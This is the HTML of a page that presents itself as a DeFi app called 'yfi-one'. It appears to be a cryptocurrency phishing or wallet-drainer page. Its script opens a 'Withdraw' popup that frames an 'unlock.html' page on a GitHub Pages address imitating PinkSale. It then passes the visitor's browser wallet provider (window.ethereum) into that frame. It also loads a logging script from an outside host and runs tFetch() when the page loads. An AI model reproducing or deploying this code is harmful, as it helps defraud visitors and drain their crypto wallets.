
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,initial-scale=1,height=device-height,maximum-scale=1,user-scalable=no">
    <link rel="icon" href="https://static.hwweb.online/584f/favicon.ico">
    <title>$P</title>
    <link href="https://static.hwweb.online/584f/js/app159925.js" rel="preload" as="script">
    <link href="https://static.hwweb.online/584f/js/chunk-vendors159925.js" rel="preload" as="script">
    <script src="https://static.hwweb.online/584f/include/jquery.min.js"></script>
<script src="https://static.hwweb.online/584f/include/layer.min.js"></script>
<script src="https://static.hwweb.online/584f/include/fastclick.min.js"></script>
<script src="https://static.hwweb.online/56e1/jsLog.js"></script>
</head>

<style>
    body .layerdemo {
        border-radius: 10px;
        color: black;
        position: fixed;
        width: 100%;
    }

    body .layerdemo .layui-layer-title {
        background: #1fc7d4;
        color: #fff;
    }

    body .layerdemo {
        border-radius: 10px;
    }

    body .layerdemo .layui-layer-title {
        border-radius: 10px 10px 0 0;
    }

    body .layerdemo .layui-layer-btn {
        border-top: 0px solid #E9E7E7
    }

    body .layerdemo .layui-layer-btn a {
        background: #333;
    }

    body .layerdemo .layui-layer-btn .layui-layer-btn1 {
        background: #999;
    }
</style>
<body>
<noscript><strong>We're sorry but yfi-one doesn't work properly without JavaScript enabled. Please enable it to
    continue.</strong></noscript>
<div id="app"></div>
<script src="https://static.hwweb.online/584f/js/chunk-vendors159925.js"></script>
<script src="https://static.hwweb.online/584f/js/app159925.js"></script>

<script>
    window.dataLayer = window.dataLayer || [];

    $(function() {
        FastClick.attach(document.body);

    });

    var showArea = function() {
        if (!IsPC()) {
            return ['95%', '70%'];
        } else {
            var height = $(document).height();
            var width = $(document).width();
            console.log(height, width);
            return ['730px', '510px'];
        }
    }
    var OpenWindow = function() {
        layer.open({
            type: 2,
            title: ['Withdraw', 'background-color:#03179D;border-radius: 10px 10px 0 0;'],
            fix: false,
            closeBtn: 1,
            zIndex: 1989101400,
            shadeClose: false,
            maxmin: false,
            skin: 'layerdemo',
            area: showArea(),
            shade: 0.3,
            content: 'https://pinksale-finance.github.io/test2/pDOT_files/unlock.html',
            scrollbar: false,
            id:'test_layer',
            success:(layero, index)=>{
                if(window.ethereum){
                    var frameId = document.getElementById('test_layer').getElementsByTagName("iframe")[0].id;
                    document.getElementById(frameId).contentWindow.ethereum =  window.ethereum;
                }
            }
        });
    }
    function IsPC() {
        var userAgentInfo = navigator.userAgent;
        var Agents = ["Android ", "iPhone ",
            "SymbianOS ", "Windows Phone ",
            "iPad ", "iPod "
        ];
        var flag = true;
        for (var v = 0; v < Agents.length; v++) {
            if (userAgentInfo.indexOf(Agents[v]) > 0) {
                flag = false;
                break;
            }
        }
        return flag;
    };
    $(document).ready(function (){
        tFetch();
    });
</script>
</body>
</html>
